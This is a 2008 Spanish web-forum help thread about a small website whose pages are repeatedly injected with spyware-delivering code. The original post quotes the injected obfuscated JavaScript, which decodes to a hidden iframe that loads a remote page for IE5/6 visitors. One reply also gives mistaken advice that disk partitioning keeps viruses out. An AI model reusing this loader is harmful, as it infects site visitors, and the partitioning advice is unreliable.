HTML - Soy NUEVA en esto.. y necesito su AYUDA =(

 
Vista:

Soy NUEVA en esto.. y necesito su AYUDA =(

Publicado por Andrea (1 intervención) el 16/08/2008 01:40:12
Hola a todos
Un amigo me pidió que le hiciera un página Web, así utilizando el Front Page 2000 la terminé.

Después de que le apareció un virus en su PC, ahora cada vez que uno entra a su página se carga un Spyware (BRAVIAX.EXE) y está infectando todas la computadoras que entran a esa página.

Yo volví a cargar los archivos orginales (HTM) mediante un FTP, pero se vuelve a generar un código SCRIPT en los archivos

El código que aparece es este:

<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E6E75646563656C6562726974792E6F72672E756B2F746F706C6973742F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie 6.0') != -1 || v.indexOf('msie 5.') != -1){document.write(unescape(o));}</script>

Lo borro, grabo el archivo y lo vuelvo a subir y vuelve a pasar lo mismo

¿QUE HAGO? ESTOY DESESPERADA

Muchas gracias
Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder

RE:Soy NUEVA en esto.. y necesito su AYUDA =(

Publicado por anita (1 intervención) el 18/08/2008 11:32:24
A mi me paso algo parecido hace tiempo.

Me insertaban un codigo parecido en las marcas <iframe>. Resultó que se había habido una incrusión el el servidor donde se alojaba a página web.

Habla con la gente del alojamiendo de la web, que te cambien las contraseñas de ftp y si tiene una copia de seguridad 'no infectada' q te la suban. Si no que te eliminen el espacio web y te lo cuelvan a crear.

En mi caso, despues del cambio de contraseñas y demás no volvió a pasar.

Espero q te ayude, un saludo
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Soy NUEVA en esto.. y necesito su AYUDA =(

Publicado por YADIRA (1 intervención) el 18/09/2008 23:54:52
LO QUE DEBE HACER EN ESTOS CASO ES QUE, LAMENTABLEMENTE EL VIRUS YA AFECTO EL SISTEMA OPERATIVO POR LO CONSIGUENTE DEBE FORMATEAR E INSTALAR DENUEVO EL SITEMA OPERATIVO PERO ESTA VES PARTICIONE EL DISCO DURO Y USE UNA DE LAS PARTICIONES PARA LA ISTALACION DEL SISTEMA OPRATIVO Y EN LA OTRA MONTA LOS PROGRAMAS PARA QUE LOS VIRUS NO VUELBAN AFECTAR EL SISTEMA OPRERATIVO,
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar